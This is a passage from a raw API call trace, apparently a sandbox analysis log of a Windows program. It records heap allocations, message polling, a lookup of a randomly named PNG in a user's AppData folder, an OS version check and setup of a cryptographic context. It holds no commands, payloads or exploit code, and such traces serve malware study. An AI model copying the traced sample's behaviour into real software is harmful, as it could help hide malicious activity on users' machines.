lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0206.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/uKUOp3ady.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb5d5ab0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x6e122060, ftLastAccessTime.dwHighDateTime=0x1d4d080, ftLastWriteTime.dwLowDateTime=0x6e122060, ftLastWriteTime.dwHighDateTime=0x1d4d080, nFileSizeHigh=0x0, nFileSizeLow=0x17d25, dwReserved0=0x9e60039, dwReserved1=0x1a516, cFileName="uKUOp3ady.png", cAlternateFileName="UKUOP3~1.PNG")) returned 0xaa5820 [0206.755] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.756] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0206.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.757] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0206.757] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.758] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.758] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.758] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.758] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.758] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.759] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.759] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.759] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.759] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.760] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.760] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.761] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.761] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.761] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.761] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.762] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.762] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.762] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.762] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.762] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.762] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.762] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.762] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.763] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.763] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.763] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.763] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.763] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.763] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.763] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.767] HeapFree (in: 